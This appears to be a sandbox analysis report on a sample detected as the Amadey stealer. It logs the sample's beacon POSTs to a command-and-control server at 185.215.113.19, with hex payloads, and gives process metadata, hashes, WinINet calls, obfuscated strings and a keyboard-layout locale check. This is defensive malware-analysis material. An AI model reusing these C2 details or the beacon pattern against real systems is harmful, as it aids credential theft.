Jul 26, 2024 12:58:00.032094002 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:58:00.293641090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49759	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:00.401077032 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:01.198096991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:58:01.203833103 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:58:01.463365078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49760	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:01.573045969 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:02.313822031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:58:02.314673901 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:58:02.560359955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	06:55:58
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\LbMTyCFRzs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LbMTyCFRzs.exe"
Imagebase:	0xa10000
File size:	1'894'912 bytes
MD5 hash:	7E7DD12E929D3D547CC88C21BAECDDC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2031237182.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2071426754.0000000000A11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:56:01
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0x610000
File size:	1'894'912 bytes
MD5 hash:	7E7DD12E929D3D547CC88C21BAECDDC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2057567755.0000000005180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2097820890.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 52%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:57:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x610000
File size:	1'894'912 bytes
MD5 hash:	7E7DD12E929D3D547CC88C21BAECDDC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2645029293.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 05400DB3 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b10013571bb65d7fbe11cb647af0865a0f155ea5af3eca1641d576ac63004e
Instruction ID: daf24bf128bf3601f3ace46c92ac7737740afe6267b56007dbeea3cf0302b169
Opcode Fuzzy Hash: d8b10013571bb65d7fbe11cb647af0865a0f155ea5af3eca1641d576ac63004e
Instruction Fuzzy Hash: 3D115EEB14C124BD614295812B1CBF66A2FE5D26703B19137F80BE1582E2F84F5F61B1

Function 05400DD2 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceff069697c659d6395422b1d86574b2c4640a5dd5340e1c6ca307d7040d246a
Instruction ID: 088ffa240c400c5d6b03f7ad0e4f29fdee36c4013820277e629bbaaa6e5e5fd6
Opcode Fuzzy Hash: ceff069697c659d6395422b1d86574b2c4640a5dd5340e1c6ca307d7040d246a
Instruction Fuzzy Hash: 542180EB148114BDA14295912B1CBF7662FE5D26307B0903BF80BE1582E2E44F5F60B1

Function 05400DBC Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d2b92c53fdb99c66117621bf23afc459172d95a30e631ad51b38a42af22b07
Instruction ID: baf32af745f18efc320be1bcae737964a0ccefe68c1663e03ae7f918b552876b
Opcode Fuzzy Hash: d6d2b92c53fdb99c66117621bf23afc459172d95a30e631ad51b38a42af22b07
Instruction Fuzzy Hash: D7117FEB14C124BDA14295912B2CBF76A2FE1D26703B09037F84BE1582E2E84F5F61B1

Function 05400DF0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fe5a1c26e2c2ec500be8aeffb915c164a2ed887583d8f5e7c3afe892c0baf0
Instruction ID: 6bdc11abe2d5621531f3a8c6ef44f0bb5f167ccf27b2fe4abc75fb88a441f8e9
Opcode Fuzzy Hash: a4fe5a1c26e2c2ec500be8aeffb915c164a2ed887583d8f5e7c3afe892c0baf0
Instruction Fuzzy Hash: 641181EB14C1506DA24281922B1CBF76B2BE5C36703B0947BF44BE5586D2A80F5E61B2

Function 05400DF9 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a664537ab75d2de0566e7af1d7ba72c608747481cf5b99d2f421cce3cc7b734f
Instruction ID: d6410b53df5bdbb5cc033b379f371ef78aac43da1fba794f9060842f74280b10
Opcode Fuzzy Hash: a664537ab75d2de0566e7af1d7ba72c608747481cf5b99d2f421cce3cc7b734f
Instruction Fuzzy Hash: FF1181EB14C110BDA14296912B18BF6AA2FE1D36703B19437F84BE1482E2F80F5E61B1

Function 05400E27 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ad65dbb5acc6e69d1bba8b327e366d5dd7d1a0c4f1dee21d0b39dac55fd310
Instruction ID: b5567a3daa95ec7172bce9c788b94d3f3a4f71046d4724139b0fc168e546db28
Opcode Fuzzy Hash: d8ad65dbb5acc6e69d1bba8b327e366d5dd7d1a0c4f1dee21d0b39dac55fd310
Instruction Fuzzy Hash: CE0184EB048010BDA14292916B18BF76B2FE6D27703709537F44BE1582D2F80F5E6171

Function 05400E37 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3329dc0ae7012953191c681ba60c815268645bf72cdea7dffb67e225752494
Instruction ID: ffa96b749d7cd521ae53befed98600eb90b387354434a5f0a8a6f0aef5c576fc
Opcode Fuzzy Hash: 9c3329dc0ae7012953191c681ba60c815268645bf72cdea7dffb67e225752494
Instruction Fuzzy Hash: 3E0192EB5481247D614292912B1CBF7AA2FE5D36703709437F847F5586E2F84F5E20B1

Function 05400E9F Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0680aaeef3732afe9e7a572c51ae4ae40b043b26359633807c8005b7cffec15e
Instruction ID: b98dc4e028caa8d98386973140e7808ed559116be5df7181c33d87dcfe3af740
Opcode Fuzzy Hash: 0680aaeef3732afe9e7a572c51ae4ae40b043b26359633807c8005b7cffec15e
Instruction Fuzzy Hash: 5EF0A0E7148120AE9142A1922B187F3A62BE6D3B703715537F447E194691F80F5F31B2

Function 05400EAF Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189c91902fa1de7f8043a294616248ecfb5fd10c37d6b8a90d0d9cbd1bf0d8f3
Instruction ID: 5f077de6d2a158ebdfda018ef0446294c051833c9b30345a0ca0ae64e1ccd92b
Opcode Fuzzy Hash: 189c91902fa1de7f8043a294616248ecfb5fd10c37d6b8a90d0d9cbd1bf0d8f3
Instruction Fuzzy Hash: D4E06DE7548120AEA042A1962A18AF6AA6BF1E3A703719437B447D1986D2F84F5E2172

Function 05400ED0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9cf228e983638885ba9623286ace759acfd0abb1f1497f22ea67f9798aaf62d
Instruction ID: 50642f1a479eee0d1d0feea1fa41fdfc1ad6ac041c964998ea824bd501af5d0a
Opcode Fuzzy Hash: e9cf228e983638885ba9623286ace759acfd0abb1f1497f22ea67f9798aaf62d
Instruction Fuzzy Hash: 86E04FEB5480247DA04290863B14BF3962FD0D3B703759477B942D2A4AE2E80F5E3071

Non-executed Functions

Function 054000BF Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073641225.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_LbMTyCFRzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 905e7ab96000154ca31e5602a54f93483a56eeb0a5bb30820280223162bd80de
Instruction ID: d5be357090069a12f46787271ea0a42203b15327cb6afa67181669e6456204e0
Opcode Fuzzy Hash: 905e7ab96000154ca31e5602a54f93483a56eeb0a5bb30820280223162bd80de
Instruction Fuzzy Hash: 6701D1E72481507D2207D0942B59BF76B6EE4D77303709077F40BDF642E2A54E4B21B0

Analysis Process: explorti.exePID: 7912, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.9%
Total number of Nodes:	546
Total number of Limit Nodes:	33

Executed Functions

Function 0061BD60 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00668D68,00000000,00000000,00000000,00000000), ref: 0061BDEC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0061BE11
HttpOpenRequestA.WININET(?,00000000), ref: 0061BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0061BF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 0061BFCD
InternetCloseHandle.WININET(?), ref: 0061C0A7
InternetCloseHandle.WININET(?), ref: 0061C0AF
InternetCloseHandle.WININET(?), ref: 0061C0B7

Strings

PoPn, xrefs: 0061D516
stoi argument out of range, xrefs: 0061E3FA
, xrefs: 0061CA1D, 0061CBF8
invalid stoi argument, xrefs: 0061E404
6JLUcBRYEz9=, xrefs: 0061C385
6JLUcxtnEx==, xrefs: 0061C2EB, 0061C543
d4g, xrefs: 0061E2FF
PG3NVu==, xrefs: 0061BE33
p, xrefs: 0061CD98, 0061D0C6, 0061D657

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d4g$invalid stoi argument$p$stoi argument out of range$
API String ID: 688256393-2241763706
Opcode ID: c1c527e6677c1c38db7e397d68d28b044a417ca62be32833555be43621541d26
Instruction ID: b9f7f74fb3a26e13a5da4abeb9fb0ec91b7ff9d26b645bc7804d4f2bddf34283
Opcode Fuzzy Hash: c1c527e6677c1c38db7e397d68d28b044a417ca62be32833555be43621541d26
Instruction Fuzzy Hash: B3B1F4B16001189BEB24CF28CC85BEEBB76EF45314F5481ADF50897281D7719AC4CFA9

Function 006246C0 Relevance: 38.5, APIs: 1, Strings: 23, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00627870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0062795C
Part of subcall function 00627870: __Cnd_destroy_in_situ.LIBCPMT ref: 00627968
Part of subcall function 00627870: __Mtx_destroy_in_situ.LIBCPMT ref: 00627971

Part of subcall function 0061BD60: InternetOpenW.WININET(00668D68,00000000,00000000,00000000,00000000), ref: 0061BDEC
Part of subcall function 0061BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0061BE11
Part of subcall function 0061BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0061BE5B

std::_Xinvalid_argument.LIBCPMT ref: 00624EA2

Strings

P, xrefs: 00626B3C
stoi argument out of range, xrefs: 00624269, 00624EAC
TZC0, xrefs: 0062541E
85K3cq==, xrefs: 00624712
0657d1, xrefs: 00625489
KIK+, xrefs: 006247BD, 006248EC, 00624ADC, 00624C0B
IEYUMK==, xrefs: 006254B9
TZS0, xrefs: 0062537A
9YY0, xrefs: 006253CC
KIG+, xrefs: 00624776, 006247ED, 00624A95, 00624B0C
UIU0, xrefs: 006253A3
75G0, xrefs: 00625470
9pG0, xrefs: 006254DB
Dy==, xrefs: 0062369E, 00624D2D
84K0, xrefs: 00625497
246122658369, xrefs: 00624F4D, 00624F8F, 00624F99, 006254F4
Toe0, xrefs: 00625447
-g, xrefs: 00624F3A
8IG0, xrefs: 006253F5
7JS0, xrefs: 00625351
8lU=, xrefs: 00626383, 00626652
6YK0, xrefs: 00625502
7470, xrefs: 0062531D

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$P$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-g
API String ID: 2414744145-2556136354
Opcode ID: ec739fc83d3337515a82d3f20c03d348edd653f698eac8c61a222c8594878b3f
Instruction ID: bd443caec5b8c22cae7120b19ad8e5aeab38dc542c089ef5838719df1717601a
Opcode Fuzzy Hash: ec739fc83d3337515a82d3f20c03d348edd653f698eac8c61a222c8594878b3f
Instruction Fuzzy Hash: AC232371A005688BEB19DB28DD8979DBB739B81304F5481DCE049AB2C2EB759FC4CF91

Function 00615DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 00615FD9
0000043f, xrefs: 0061603B
00000419, xrefs: 00615FA8
00000423, xrefs: 0061600A
Keyboard Layout\Preload, xrefs: 00615F64

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 364823f70e1675da3d5741aa713464509285eee99e2ed9c7dcdbc62b2a8cea13
Instruction ID: d284928a38c6d258f90998715b0ea1a37c5830fadaa8e80c956777e56d132e71
Opcode Fuzzy Hash: 364823f70e1675da3d5741aa713464509285eee99e2ed9c7dcdbc62b2a8cea13
Instruction Fuzzy Hash: DCE17F71904228AFEB24DFA4CC89BDDB7BAAF04304F5442D9E509A7291D774ABC48F91

Function 00617D00 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00617EA3

Strings

HlusMa==, xrefs: 0061810A
h, xrefs: 00617DBA
HlurNa==, xrefs: 006181B2
HlurOK==, xrefs: 00618062

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
